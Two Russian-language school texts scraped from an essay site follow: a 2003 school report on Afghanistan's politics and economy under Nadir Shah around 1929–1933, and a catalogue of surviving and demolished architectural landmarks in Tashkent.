Между тем Аманулла-хан, прибыв в Кандагар и узнав о бегстве Инаятулла-хана, взял назад своё отречение и начал готовиться к походу на Кабул. Население провинции неохотно откликнулись на призыв поддержать его в борьбе за престол. Однако в скором времени ему удалось собрать небольшую армию и 26 марта выступить из Кандагара в сторону Газни, к месту сосредоточения крупных сил Бачаи Сакао. К середине апреля войска бывшего короля достигли Газни и вступили в бой с армией Бачаи Сакао. Но неудачи и здесь преследовали Амануллу-хана. Его армия плохо снабжалась, моральный дух солдат был чрезвычайно низким, к тому же на стороне Бачаи Сакао выступили племена гильзаев (давних противников дуррани). В конце апреля армия Амануллы-хана начала беспорядочное отступление. 23 мая бывший король объявил о прекращении борьбы и вместе с семьёй покинул Афганистан. Поражение Амануллы-хана предопределилось программой его борьбы, которая не подвергалась изменениям и поэтому не получила широкой поддержки.
В апреле 1929 г. бывший афганский посол в Москве Гулам Наби-хан собрал довольно многочисленный отряд из узбеков и хазарейцев и неожиданно ударом захватил Мазари-Шариф. Он выступил как сторонник Амануллы-хана, не выдвигая собственных притязаний на трон. Вскоре его власть распространилась на весь север Афганистана. Однако после поражения Амануллы-хана позиции Гулам Наби-хана ослабили, и он также прекратил борьбу. Покинул Афганистан в начале июня.
Весной 1929 г. в борьбу за трон вступил бывший военный министр Амануллы-хана генерал Мухаммад Надир-хан. За позицию радикализму, с которым Аманулла-хан проводил свои реформы, в 1924 г. он был смещён с поста министра и направлен послом во Францию.
В 1927 г. он ушёл на пенсию и поселился в Ницце в качестве частного лица. После прихода к власти Бачаи Сакао он выехал вместе со своими братьями Шах Вали-ханом и Хашим-ханом на родину, объявив о намерении бороться против кабульского эмира, незаконно узурпировавшегося власть. В то же время Надир-хан отказал в поддержке Аманулле-хану, стремясь организовать самостоятельное движение. Свои стремления к захвату власти он прикрывал лозунгами борьбы за “прекращение гражданской войны и кровопролития” .
В марте1929 г. Надир-хан прибыл в Хост и стал собирать ополчение племён. На первом этапе борьбы против Бачаи Сакао его сопровождали неудачи. В зоне племён происходили межплеменные распри, преобладали сепаратистские настроения. Крестьянство всё ещё верило обещаниям Бачаи Сакао облегчить налоговый гнёт. К тому же военно-политическая кампания Надир-хана началась в период весенних полевых работ, когда крестьяне были заняты на полях. Надир-хан испытывал и значительные финансовые затруднения.
Однако к концу лета обстановка значительно изменилась. Политика Бачаи Сакао привела страну к экономическому тупику и политической анархии. Крестьянство перестало поддерживать режим. Сокращение торговли, произвол и репрессии против купцов привели их в лагерь противников кабульского эмира. Усилилась децентрализация страны; возникла опасность гражданской войны и ослабление суверенитета, которые могли привести к потере государственной независимости. Не прекращались стихийные волнения трудовых слоёв. В этих условиях различные прослойки господствующих классов, оказавших вначале помощь Бачаи Сакао, отошли от него, что создало благоприятные условия для реализации замыслов Надир-хана. Немалую помощь ему оказала и Великобритания, с представителями которой он издавна поддерживал тесные контакты. Деятельность Надир-хана, направленная на подавление стихийного народного движения, объединение верхушки господствующих классов и установление твёрдой власти, соответствовала их интересам. Вначале сентября 1929 г. британские колониальные власти способствовали тому, что несколько тысяч человек из племён вазиров и махсудов, проживавших на территории Британской Индии, влились в армию Надира. Позже, уже придя к власти, Надир-хан получил безвозмездную финансовую помощь от британского правительства в размере 175 тыс. ф. ст.
К концу сентября Надир-хан и его сторонники перешли к решительным действиям. 8 октября его армия, нанеся крупное поражение войскам эмира, овладела Кабулом. Бачаи Сакао, будучи не в силах оказать серьёзное сопротивление, бежал из столицы, но был схвачен и 2 ноября 1929 г. казнён вместе со своими ближайшими приспешниками.
15 октября Надир-хан въехал в столицу. На собрании своих приближённых сторонников он был провозглашён падишахом Афганистана.
пвкпав
В лагере Надир – шаха оказались как бывшие противники Амануллы – шаха крупные феодалы, сардары и ханы племен, косные ортодоксальные муллы, так и представители новых слоев либеральных помещиков, торгово- ростовщического капитала. Для одних он был достаточно консервативен, ибо выступал против радикализма младоафганцев, другие считали его деятелем, разделявшим идеи экономического прогресса умеренной модернизации. Пртов него выступали многие влиятельные сторонники Амануллы – хана. Надир – шах жестоко расправился младоафганской оппозицией. Был арестован и казнен один из ближайших соратников бывшего короля, Мухамад Вали – хан. В 1932 вернулся из эмиграции Гулам Наби – хан, который был также вскоре арестован и казнен по обвинению в организации антинадировского заговора среди племен Хоста. Несколько позже был казнен его брат Гулам Джелани – хан. Многие амуналлиситы были арестованы, некоторые высланы из Афганистана.
В стране продолжались выступления крестьян, национальных меньшинств, бедняков скотоводов из пуштунских племен вне связи с интересами, какой – либо политической группировки или претендента на престол. Хотя Надир – шах и правящая верхушка, напуганные размахом стихийного недовольства масс, объявили «о некотором снисхождении при взыскании недоимок», сама налоговая система оставалась без изменений, поборы и притеснения со стороны чиновников не уменьшались. Крестьянское хозяйство серьезно страдало в ходе событий 1928 – 1929 гг.
Уже в ноябре 1929 г. вспыхнули крестьянские волнения в Кухдамане, к северу от Кабула. Восставшие, численность которых достигла 10 тыс. человек, 30 ноября захватили г. Чарикар и совершили нападение на г. Джабаль ус-Серадж. Движение, во главе которого стояли наиболее сознательные крестьяне, было жестоко подавлено.
В июне 1930 г. в этом районе вновь вспыхнуло восстание. К восставшему таджикскому населению присоединились некоторые пуштунские крестьяне, недовольные налоговой политикой правительства. Регулярные армейские части не смогли разгромить отряды восставших. В августе в Кабуле собралось 25 тыс. ополченцев из различных пуштунских племен, которым он обещал снизить налоги или вообще освободить от уплаты их.
В октябре 1932 г. вспыхнули волнения племен в районе Хоста. Восставшие выступили против налоговой политики правительства и обвинили Надир – шаха в нарушении обещаний снизить налоги. Во главе восстания стал выходец из низшего духовенства мулла Леванаи. Восстание длилось более полугода. Надир – шах обратился к британским властям в Индии с просьбой воспрепятствовать племенам вазиров – масхудов, проживавших в Индии, участвовать в этом движении. Английские колониальные власти оказали поддержку Надир – шаху. Восставшие потерпели поражение.
Все эти выступления были составной частью общего процесса классовой борьбы, развернувшейся в предыдущие годы. Не достигнув масштабов социальных столкновений предшествующего периода, они были наполнены новым классовым содержанием, отражали возросший уровень социально – политической зрелости крестьянства. Поэтому эксплуататорские классы считали эти движения опасными, чем радикализм реформаторов – младоафганцев. Это побуждало их сплотиться вокруг режима Надир – шаха.
Вместе с тем летом 1931 г. афганская армия ликвидировала остатки басмаческих отрядов, не только нарушавших советскую границу, но и занимавшихся разбоем на афганской территории.
Сформировав правительство из своих родственников и ближайших соратников, Надир–шах уже 16 ноября 1929 г. выступили с деклараций, в которой были изложены основные принципы его внутренней и внешней политики. Главный акцент был сделан на идею «классового союза» как стержень социальной структуры государства. Целями экономической деятельности объявлялись упорядочение налоговой системы и борьба с казнокрадством.
Важное место в программе Надир – шаха отводилось религии. Были оставлены без изменения, восстановленные и расширенные режимом Бачаи Сакао права и привилегии богословов, которые получили возможность влиять на решения важных государственных вопросов через Совет улемов, созданный в рамках структуры министерства юстиции. Все положения гражданского и уголовного кодекса были приведены в соответствии с нормами шариатского права. Женщинам вновь вменялось в обязанности носить чадру. Были закрыты женские школы, возрождена полигамия.
Основные прицепы режима Надир – шаха, изложенные в его декларации, получили юридическое оформление в конституции принятой на заседании Лоя Джирги в октябре 1931г. Ее главная задача сводилась к закреплению власти господствующих классов и ограждению их интересов от социальных опасностей, порожденных народными выступлениями периода 1928-1929 гг. В то же время режим не мог не учитывать растущего влияния буржуазных классов, стремившихся занять свое место в системе государственного управления. Они в первую очередь были заинтересованы в национального суверенитета и ликвидации остатков феодальной раздробленности. В Основном законе провозглашались равенство всех подданных пред законом, ряд гражданских свобод, отменялись феодальные сословные ограничения. Была объявлена свобода торговой, промышленной и сельскохозяйственной деятельности, а также неприкосновенность частной собственности.
Содержание значительной части положений конституции 1931 г. определялось преобладанием феодальных отношений в экономике страна. В них законодательно закреплялись права и привилегии мусульманских богословов. Права афганских поданных, заявлялось в конституции, регламентируются не только законами, но и положениями шариата. Муллы получили большие возможности в области просвещения. Преподавания исламских наук объявлялось свободным. Шариатским судам была предоставлена автономия.
Изменившаяся социальная структура власти, воображая в себя представителей буржуазных классов, определяла и форму государственного управления. Были расширены функции Лоя Джирги в вопросах финансовой, и в частности налоговой политики. Одновременно в конституции было зафиксировано участие торгово–помещичьих кругов в государственных органах. В Афганистане учреждался парламент, состоявший из двух палат – верхней, Совета знати, и нижней, Национального Совета. Большинство верхней палаты назначалось шахом из числа крупных землевладельцев, ханов племен и верхушки богословов. Национальный совет был выборным органом, куда могли быть избранны грамотные подданные в возрасте от 30 до 70 лет, имевшие репутацию «честных и справедливых», что давало возможность правящей верхушки отвергать по политическим мотивам неугодных ей кандидатом. Права участие в выборах лишались женщины, безземельные крестьяне, перемещавшиеся по стране в поисках работы, и мелкие кочевые племена. В функции Национального совета входило одобрение законодательных актов, утверждение государственного бюджета, предоставление акционерным обществам льгот и привилегий, обсуждение вопросов по внутренним и внешним займам. Министры несли формальную ответственность перед парламентом. Национальный совет имел по существу весьма ограниченные возможности влиять на правительственную политику.
Значительная часть конституции была посвящена прерогативам и привилегиям Надир – шаха и его династии. Шах по конституции имел право утверждать состав кабинета министров, налагать вето на законопроекты, осуществлять внешнюю политику, объявлять войну, заключать мир. Закрепив в конституции позицию консервативных слоев и расширив политические права буржуазных классов, игравших растущую роль в экономике страны, режим Надир – шаха юридически оформил правящий помещичье – буржуазный блок, что во многом определило последующую эволюцию структуры
государственной власти в Афганистане.
Режиму Надир – шаха пришлось решать сложные задачи экономического развития. Кризис 1928 – 1929 гг. привел к истощению государственных ресурсов. Казна была пуста. К тому же разрешившийся мировой экономический кризис отрицательно сказался на экономике Афганистана. На мировом рынке снизились цены на каракуль – основной экспортный товар Афганистана. В связи с падением цен на серебро на внешних рынках понизился курс афганской национальной валюты. Стремясь пополнить казну, режим Надир – шаха прибег к широкой конфискации имущества сторонников Бачаи Сакао. Однако все эти средства были использованы не на восстановление расстроенного сельского хозяйства, а на пожалования ханам племен, участвовавших в борьбе против Бачао Сакако, на различные карательные операции.
Новому режиму оказала финансовую поддержку столичное купечество. Богатые купцы внесли значительные пожертвования в государственную казну и выступили с инициативой проведения экономических реформ. Их программа была сформулирована одним из крупнейших купцов Афганистана, Абдул Маджидом, который предлагал приступить к развитию сельского хозяйства и промышленности. Поскольку правящие круги продолжали линию режима Надир–шаха на объединение разрозненно национального капитала в ширкеты, торговая буржуазия, пройдя через крупные потрясения, в период кризиса 1928-1929 гг., обнаружила стремление к более тесному союзу в защиту ее интересов.
В отличие от предшествующего периода купцы в целом поддержали идею ширкетизацию национального капитала, тем более что это давало им весьма широкие возможности в конкурентной борьбе с иностранным капиталом. В месте с тем организация акционерных обществ настоятельно требовала создания национального кредитного учреждения и с его помощью контроля над денежным и внешне торговым рынком страны. В январе 1931 г. В кабуле был открыт первый в стране банк «Ширкети асхами» с капиталом более 5 млн. афгани, причем 4,5 млн. афгани принадлежало государству, а остальное национальному купечеству. Перед банком была поставлена задача стабилизировать курс национальной валюты и кредитовать купцов. Позднее, в 1932 г., была введена монополия на заготовку и экспорт каракуля и передана Афганскому национальному банку, возникшему на базе «Ширкети асхами». По существу он являлся акционерным обществом, которое, регулируя денежное обращение в стране в то же время занималось коммерческими операциями и имело монопольное право на экспорт и импорт ряда товаров.
Создав банк, правительство приступило к организации ширкетов при непосредственном участии Афганского национального банка, который становился их пайщиком. Вначале 30-х годов в стране образовалось более трех десятков крупных ширкетов, объединивших значительную часть национальных капиталов. Осуществляя монополию на экспорт и импорт многих товаров, банк и ширкеты подорвали торговое могущество иностранных купцов. Афганскому купечеству, организованные в ширкеты, были предоставлены многочисленные льготы. Объединенные общества способствовало росту внутренних накоплений. В 1936-1937 гг. общий капитал крупных ширкетов превысил 90 млн. афгани. В области внешней политике был объявлен курс на нейтралитет и развитие равноправных отношений со всеми странами, что и было закрепленно в конституции 1931 г.
В тоже время режим Надир – шаха придерживался довольно твёрдой ориентации на Великобританию. Англия, как отмечалось выше, стала оказывать поддержку Надир – шаху с момента его включения в борьбу за трон. С приходом к власти его контакты с британскими колониальными властями в Индии стали ещё более тесными. Это нашло практическое выражение в его негативном отношении к национально – освободительному движению в Северо–Западной провинции Индии, которое вылилось в 1930 г. в антиколониальное восстание в Пешаваре. Режим Надир – шаха воспрепятствовал пуштунским племенам в пограничной зоне Афганистана принять участие в этом восстании и тем помог его подавлению британскими колониальными войсками. Надир-шах опасался, что демократическое по своему характеру антиколониальное движение в Индии может оказать опасное влияние на социальную ситуацию в Афганистане. Англия со своей стороны оценила услуги Надир-шаха и предоставила ему военную и финансовую помощь.
Однако Афганистан, прошедший через сложный внутриполитический кризис, нуждался в поддержке своей национальной независимости, сторонником сохранения и укрепления которой неизменно выступал Советский Союз. 24 июня 1931 г. по инициативе Советского Союза в Кабуле был подписан советско-афганский Договор о нейтралитете и взаимном не нападении сроком на пять лет с автоматическим ежегодным продлением. Договор предусматривал невмешательство двух стран во внутренние дела друг друга, взаимный нейтралитет в случаи участия в войне одной из них, решении спорных вопросов мирными средствами.
Договор занял почетное место в отношении между двумя странами, явившись важным международным документом, проникнутым идеями дружбы и добрососедства. Заключение договора способствовало расширению советско-афганских торгово-экономических связей. В условиях мирового экономического кризиса, когда торговля Афганистана с капиталистическими странами резко сократилась, объём советско-афганской торговли серьезно возрос. Уже в 1932 г. СССР вышел на первое место в экспорте Афганистана и на второе в его импорте. К тому же торговые отношения с Советским Союзом благоприятно сказывались на развитии афганской экономики, так как СССР покупал афганские товары по твердым ценам независимо от колебаний мировой рыночной конъюнктуры. Это помогло Афганистану избежать больших потерь ввиду общего ухудшения условий внешней торговли.
Развивались отношения Афганистана и с другими странами. Особенно тесные контакты режим Надир-шаха стремился завязать с Турцией и Ираном, подписав с ними 1932 г. договоры о дружбе. Были установлены дипломатические отношения с Саудовской Аравией Ираком. Предпринимались попытки укрепить связи с Германией и Францией, использовать их экономические возможности. Но они не получили должного развития, поскольку Афганистан отказался предоставить им концессии. В 1930 г. был подписан договор о дружбе с Японией, который, однако, не привел к сколько–нибудь широким контактам между двумя странами. Была предпринята попытка привлечь капиталы США в Афганистан, туда была отправлена афганская миссия. Но американские промышленные круги, в то время озабоченные спадам в собственной экономике, не проявляли интереса к Афганистану. Период экономической и политической экспансии США в Афганистан начался позднее, после второй мировой войны.
Несколько оживилась общественно-политическая жизнь в стране. Подверглась реорганизации система административного управления. В 1932 г. открылась медицинская школа, которую вскоре преобразовали в медицинский факультет; на его базе в последствии возник Кабульский университет. Начали издаваться газеты и журналы. Однако внутри политическая обстановка в стране оставалась не стабильной. Жестокие преследования и расправы над бывшими соратниками Амануллы-хана вызвали ответные акции оппозиционных кругов. В ноябре 1933 г. Надир-шах был убит одним из амманулистом. Трон перешел к его сыну Мухаммаду Захир-шаху.
При новом шахе остался без изменений состав кабинета министров, возглавлявшийся братом Надир-шаха - Мухаммад Хашим-ханом; не изменились и основные направления политики режима. Ускорился процесс концентрации и централизации национального капитала. Деятельность Афганского национального банка и ширкетов, акционерами которых были только афганские подданные, окончательно подорвало роль иностранного купечества во внешней торговле Афганистана. Инонациональные коммерсанты лишились даже роли посредников в афганской внешней торговле.
В 30-х годах продолжалось создание крупных ширкетов не только в Кабуле, но и в других городах, в частности в Герате, Кандагаре, Мазари-Шарифе. При участие афганского национального банка был создан ряд ширкетов, ориентированных на торговлю с Советским Союзом. К 1936 г. все крупные купцы страны в основном были вовлечены в ширкеты. Хотя и продолжали параллельно самостоятельную деятельность. К концу 30-годов неизмеримо возросла роль Афганского национального банка как регулятора внешнеторговых операций, а соответственно и политическое влияние верхушки национального торгового капитала, лидер которой – президент банка купец Абдул Маджид в 1938 г. был назначен министром экономики. Банк постепенно отошел от ведения непосредственных торговых операций, переключившись на вложение капиталов в ширкеты и их кредитование. Через национальный афганский банк и его дочерние ширкеты, деятельность которых охватывала значительную часть торговых операций внутреннего рынка и практически всю внешнюю торговлю, происходил процесс накопления капитала.
В то же время частный капитал неохотно шел в сферу производства, предпочитая более прибыльную коммерцию. Поэтому в условиях 30-х годов, когда государственные финансы были не велики и поглощались в основном непроизводительными расходами, промышленное строительство не получило заметного развития. Наибольшие ассигнования из госбюджета направлялись на финансирование дорожного строительства, ряда мелких ирригационных объектов. Из немногих промышленных предприятий, возникших в это период, можно отметить хлопчатобумажную фабрику в Кандагаре, оснащенные оборудованием, купленным ещё Аманхулой-ханом в 1928 г., а также текстильный комбинат в Пули-Хумри, создание которого финансировалось правительством и торгово-промышленным ширкетом «Насаджи», ряд небольших электростанций.
Значительную помощь Афганистану в создание национальной промышленности оказал в те годы Советский Союз. С его помощью были построены хлопкоочистительные предприятия на севере страны, в том числе в Кундузе, Мазари-шарифе, Имам-Саибе и других городах. Советско-афганские отношения, строившиеся на принципах добрососедства, взаимного уважения и невмешательства во внутренние дела друг друга, приобретали все большее значение для Афганистана. Быстрый рост получила торговля между двумя странами. При этом Советский Союз проводил благоприятную для Афганистана торговую политику. Заметную помощь оказал СССР Афганистану и в развитии сельского хозяйства, особенно в борьбе с сельскохозяйственными вредителями.
Заключение.
Таким образом на протяжении данного периода, Афганистан находился в общей экономической и политической нестабильности. В стране было общее ухудшение экономической обстановки, отразившееся в первую очередь на положении трудящихся масс, ремесленников, мелкой буржуазии, что тем самым вызывало недовольство различных слоев населения, носившее в те годы стихийный характер. В зоне пуштунских племен неоднократно вспыхивали восстания крестьян и мелких скотоводов, подавляемые войсками. Однако постепенно развивалась легкая промышленность. Была принята конституция страны. Учреждался парламент и кабинет министров. Устанавливались взаимовыгодные отношения с империалистическими державами, которые оказывали экономическую поддержку Афганистану.
Министерство образования РК
Школа № 16
Реферат
ДИСЦИПЛИНА: История
ТЕМА: Афганистан
Выполнил: Свищёв М.А.
Кошуричев А.И.
Проверила: Таран Е.Г.
г. Павлодара 2003 г.
Введение
Афганистан
Внутренняя политика
Экономика
Внешняя политика
Заключение
Список литературы:
1. Проров Р.И. «Афганистан», Москва Просвещение 1996 г.
2. Ленин В.И. «Собрание сочинений», т.43 Издательство Политической Литературы Москва 1979 |
https://doc4web.ru/istoriya/arhitekturnie-i-landshaftnie-dostoprimechatelnosti-tashkenta.html | Архитектурные и ландшафтные достопримечательности Ташкента | https://doc4web.ru/uploads/files/164/278a07d07f24178c259a6ca58b19538e.docx | files/278a07d07f24178c259a6ca58b19538e.docx | План
Введение
1 Существующие архитектурные и ландшафтные достопримечательности
2 Утерянные архитектурные достопримечательности
Список литературы
Введение
Подробнее об особенностях ташкентской архитектуры в историческом плане вы можете узнать в статье Архитектурно-планировочные особенности Ташкента в конце XIX - начале XX веков.
В Ташкенте и его окрестностях имеется большое число интересных архитектурных сооружений, ландшафтных и археологических памятников, в том числе:
1. Существующие архитектурные и ландшафтные достопримечательности
Центральный сквер - сквер в центре Ташкента, первоначально являвшийся ядром архитектурно-планировочного решения нового города.
Площадь Мустакиллик (Независимости) — центральная площадь Ташкента, на которой проводятся праздничные мероприятия и военные парады в дни торжественных событий и государственных праздников.
Мингурюк - древнее античное городище в центре современного города недалеко от центрального ж/д вокзала и реки Салар.
Канка - древнее античное городище, расположенное недалеко от Ташкента - в Аккурганском районе Ташкентской области.
Шаштепа — древнее античное городище, находящиеся в южной части современного города в районе канала Джун и улицы Чаштепинской.
Шейхантау́р - архитектурно-исторический комплекс, находящийся на улице Навои (до революции - улица Шейхантаурская). Один из важнейших архитектурных памятников Ташкента.
Здание конца XIX века, построеннное по проекту архитектора Г.М.Сваричевского, на углу улиц Сулеймановой (Воронцовского пр.) и Ю.Ахунбабаева (Иканской)[1]. Здание представляет собой одноэтажный дом из обожжёного кирпича на высоком цоколе с центричной композицией фасада. С обеих сторон центрального ризалита с входом расположены ряды прямоуголных окон с дорическими пилястрами в простенках. Венчает здание фриз с широко расставленными триглифами и невысокая изящная решетка. В плане дом имеет форму буквы Г. Парадные помещения обращены к фасаду здания. Длинный коридор объединяет служебные и вспомогательные помещения, располагающиеся в глубине дома. В северо-восточной стороне особняка находилась просторная и глубокая терраса с декоративным витражем из цветного стекла и большим парадным крыльцом, спускавшимся в небольшой сад, находившийся на углу улицы Иканской и Воронцоского проспекта. Сад отгораживался от улиц кирпичной оградой с вмонтированной в неё металлической кованой решеткой. До революции этот собняк принадлежал дочери генерала армии Куравитского — Елене Казимировне Буковской[2]. После революции до начала 20-х годов XX века в доме находилось дипломатическое представительство датского красного креста, возглавляемое майором Алфом Брюном, которое занималось судьбой австро-венгерских военнопленных, находившихся в Средней Азии. Позднее в здании располагался МИД УзССР. В начале 90-х годов прошлого века в здании находилось узбекское общество дружбы и культурных связей с зарубежными странами.
Здание бывшего дворца Великого князя Николая Константиновича, построенное (1889-1891) по проекту архитекторов В.С.Гейнцельмана и А.Л.Бенуа. После 1917 года в здании располагался Музей искусств Узбекистана, Республиканский дворец пионеров (40, 50, 60 и 70-е годы прошлого века), музей антиквариата и ювилирного искусства Узбекистана (до начала 90-х годов прошлого века), в настоящее время это Дом приемов МИДа Узбекистана[3].
Здание бывшей аптеки Каплана[4], построенное в 1906 году по проекту архитектора Г. М. Сваричевского. В советское время в этом здании на улице Пушкинской находился Университет Марксизма-ленинизма. В настоящее время - здание банка.
Корпуса мужской и женской гимназий, построенные в 1888 году по проекту архитектора Янчевского. С начала 20-х годов прошлого века в этих корпусах располагался Первый в Средней Азии Университет. Позднее в здании женской гимназии располагался факультет ташкентского автодорожного института. В тридцатых годах XX века оба здания гимназий были надстроены и стали трехэтажными.
Здание отделения государственного банка, входящее наряду со зданиями мужской и женской гимназии в архитектурный ансамбль, окаймляющий Центральный сквер города. Сохранилось до настоящего времени практически в неизменном виде.
Здание Союза писателей Узбекистана расположено на Пушкинской улице прямо рядом со зданием отделения государственного банка. Первоначально строилось (1940 год), как здание городского комитета Коммунистической партии (архитекторы С. Ларионов и В. Волчек)[5].
Здание Реального училища на углу Махрамского (сейчас Узбекистанский проспект) и Константиновского проспектов. В советское время в здании располагался Химический факультет САГУ, а затем ТашГУ.
Здание тульской фирмы самоваров «Братья Шемарины» 1911 года постройки. Помещения в этом доме сдавались в наем различным монофактурным компаниям. После 1917 года было конфисковано государством и использовалось под различные службы Исполкома.
Здание Первого Ташкентского Совета (Дом Вадьяева)[6]. В настоящее время здание детской библиотеки. В начале XX века в этом здании располагалось общественное собрание.
Здание бывшей Казенной палаты, построенное в 1887 году по проекту архитектора В.С.Гейнцельмана. В советское время в конце 70-х, 80-х годов в нём располагался Музей истории народов Узбекистана[7].
Ташкентские куранты - на протяжении многих десятилетий являлись символом Ташкента. Построены в 1947 году - заработали 30 апреля 1947 года. Архитектор А.А.Мухамедшин, Главный инженер строительства В.Левченко[8][9]. Строительство было начато по инициативе И.А.Айзенштейна - жителя города Ташкента, работавшего в мирное время часовщиком, которые привез в качестве трофея из Германии после Войны часовой механизм башенных часов и подарил часы своему родному городу от имени полка, в котором он служил. Ранее часы располагались в здании городской ратуши городка Алленштайн в Восточной Пруссии[10], разрушенной во время боевых действий. На проект здания для часов архитекторным управлением города проводился конкурс, и был выбран лучший проект, а само строительство 30 метровой башни на тот момент считалось уникальным. Отделка здания курантов выполнялась при активном участии знаменитого резчика по ганчу (сырому алебастру), прославленного художника-орнаменталиста, почетного члена Академии наук Узбекистана усто[11] Ширина Мурадова[12].
Интересно, что в 2009 году недалеко от старых курантов была построена точная копия башни, с установленными на ней курантами, поэтому в настоящее время в Ташкенте недалеко друг от друга стоят две башни с одинаковыми курантами[13].
Здание Пассажа Яушевых[14][15] на Ирджарской (в советское время улица Кирова), в настоящее время в нём располагается банк.
Здание Ташкентское отделения Азово-Донского банка[16] - находящееся на углу улицы Ирджарской (в советское время улица Кирова) и Воронцовского проспекта (ныне улица Сулеймановой). Здание было построено в 1910 году. После революции и до конца 70-х годов прошлого (XX) в здании находилось отделение государственного банка, позднее учебный центр МНУЦ. В настоящее время ГосЗнак Республики Узбекистан.
Ташкентский Свято-Успенский кафедральный собор - расположен на улице Госпитальной рядом со старой территорией Военного госпиталя недалеко от центрального железнодорожного вокзала. В настоящее время собор является кафедральным собором Ташкентской епархии, то есть главным храмом Ташкентской епархии.
Евангелистско-лютеранская церковь (кирха), расположенная на улице Садыка Азимова (старое название - улица Жуковского). Служба в этом соборе началась 3 октября 1899 г. Здание кирхи построено лютеранской общиной города на деньги И. И. Краузе по проекту А.Л. Бенуа. В советское время здание использовалось под склад, в конце 70-х годов XX века здание было передано ташкентской консерватории и после проведенной реставрации стало использоваться как помещение для оперной студии консерватории. В это же время в здании был установлен орган и в нём стали регулярно проводится концерты органной музыки. В 90-е годы XX века здание было передано вновь созданной лютеранской общине города, хотя реальное число лютеран в Ташкенте на тот момент было весьма малочисленным[17].
Католический костёл — Римско-католический храм «Святейшего Сердца Иисуса», известный в городе как просто польский костёл, расположенный на улице Садыка Азимова напротив старого ТашМИ.
Склад товарищества ситценабивной мануфактуры "Эмиль Циндель" в старогородской части города Ташкента. После 1917 года штаб коммунистической партийной дружины и помещение Совета рабочих депутатов старогородской части Ташкента.
Здание Республиканского театра оперы и балета им. Алишера Навои, построенное в 1940 — 1947 годах по проекту архитектора А.В.Щусева[18]. Строительство здания театра было начато на площади, где в течение долгого времени в Ташкенте располагался Воскресенский базар[19]. Торжественное открытие театра состоялось в ноябрьские дни 1947 года, во время празднования 500-летя со дня рождения А.Навои, в честь которого и было присвоено имя новому театру. Зрительный зал вмещает 1400 человек, площадь сцены 540 кв. м. Шесть залов фойе, расположенных на трех этажах по сторонам зрительного зала, посвящены шести имевшимся в составе Узбекской ССР в 1947 году областям: Ташкентской, Самаркандской, Бухарской, Термезской, Хивинской и Ферганской. Для оформления залов здания театра архитектором были приглашены мастера из каждой области. За создание театра А.В.Щусеву была присуждена Государственная премия СССР 1948 года. В начале войны строительство было заморожено и вновь возобновилось в 1943 году. Интересно, что в послевоенные годы строительство здания театра осуществлялось в основном силами японских военнопленных, находившихся в то время в Ташкенте.
Комплекс зданий Ташкентской астрономической обсерватории (в настоящее время это Астрономический институт имени Мирзо Улугбека в Ташкенте), построенных в конце XIX века по проекту архитектора В. С. Гейнцельмана.
Здание Туркестанской судебной палаты и Окружного суда (в настоящее время это Здание управления железной дороги). На фотографии даётся вид на парадный вход здания. В настоящее время это вид на здание со стороны внутреннего двора управления железной дороги, поэтому сейчас эту часть здания с улицы увидеть нельзя. Первоначально здание было построено в 1912 году по проекту архитекторов Г. М. Сваричевского и К. М. Тильтина для Туркестанской судебной палаты и Окружного суда. Полностью строительство комплекса было завершено к 1918 году. Интересно, что в 1918 году это было единственное в Ташкенте здание, имевшее 3 этажа. После революции 1917 года это здание некоторое время использовалось в качестве одного из учебных корпусов среднеазиатского государственного университета.
2. Утерянные архитектурные достопримечательности
Ташкентская крепость — была построена генералом Черняевым напротив ворот Коймас (Катаган) на левом берегу канала Анхор после занятия Ташкента русскими войсками в июне 1865 года.
Ташкентский военный Спасо-Преображенский собор - здание собора[20] было построно по первоначальному эскизу архитектора Розанова, разработанному в 1871 году, и подробным проектам, выполненным военными инженерами, на площади в центре города, получившей название «Соборной». Собор был сложен из жженого кирпича, в византийском стиле и был трехпрестольный. Иконостасы всех трех алтарей с иконами были исполнены академиком М. О. Микешиным. Внутренность собора поражала своими лепными работами. Собор вмещал до 1500 человек. Колокольня была устроена отдельно от собора. В тридцатых годах прошлого века собор по решению советских властей был снесен.
Иосифо-Георгиевский собор - собор располагался у входа во дворец Великого князя Николая Константиновича Романова у перекреста улиц Соборной и Романовского (в советское время перекресток улиц Карла Маркса[21] и Ленина).
На месте, где стоял этот храм, была построена первая православная церковь в Ташкенте, которая была освящена 22 декабря 1868 года. Здание первого храма было выполнено из сырцового кирпича и дерева. В 1877 году (по другим сведениям в 1875 году) на месте старого здания по проекту архитектора Н.Ф.Ульянова инженером Шавровым был построено новое здание собора. Это было одно из красивейших и оригинальных зданий в Ташкенте, трехпрестольный храм вмещал до 800 молящихся и был выполнен из жженого кирпича, из которого были построены и многие другие красивейшие здания в Ташкенте (в настоящее время подобные сооружения принято характеризовать как здания, построенные в «Туркестанском стиле»). Собор имел трехъярусную колокольню и иконостас, выполненный из ганча (резьба по сырому алебастру), выполненные узбекскими мастерами резчиками по ганчу. Из ганча были выполнены и лепные украшения под сводом храма.
Около стен собора был похоронен скончавший в январе 1918 года Великий князь Николай Константинович Романов.
В советское время собор был «перепрофилирован». Долгое время в нём располагался Республиканский театр кукол, а в алтарной части здания было оборудовано кафе-пельменная, около которой располагалось летнее кафе-мороженое.
После получения Узбекистаном независимости эти здания были снесены в конце 90-х годов прошлого (XX) века. В настоящее время на его месте находится небольшой скверик.
Церковь Сергия Радонежского - собор был построен в 1897 году и находился в месте пересечения улицы Пушкинской и Ассакинской. Был хорошо виден в конце улицы Пушкинской прямо от Сквера. В середине тридцатых годов прошлого (XX) века по решению советских властей собор был снесен.
Здание Учительской семинарии на Сквере - частично [22] сохранялось до ноября 2009 года. В ноябре 2009 года было полностью снесено.
Здание церкви при Учительской семинарии. До ноября 2009 года здание церкви (построенное в 1898 году по проекту архитектора А. Бенуа) сохранялось частично, в измененнном виде. В ноябре 2009 года оно было снесено в связи с постройкой на его месте нового административного здания[23].
Здание Универмага Детский мир на улице Карла Маркса дореволюционной постройки. После Ташкентского землетрясения 1966 года здание не было сильно разрушено, однако, было признано нецелесообразным его восстанавливать, так как оно не вписывалось в разработанную новую градостороительную концепцию центра города, поэтому оно было снесено.
Здания магазинов на улице Карла Маркса (бывшей Кауфманской) - одно и двухэтажные здания магазинов на улице Карла Маркса. После землетрясения 1966 года были снесены.
Одно и двухэтажные здания магазинов на улице Ленина (бывшей Романовского) - одно и двухэтажные здания магазинов, находящиеся на одной из центральных улиц города - улице Ленина, после землетрясения 1966 года были снесены.
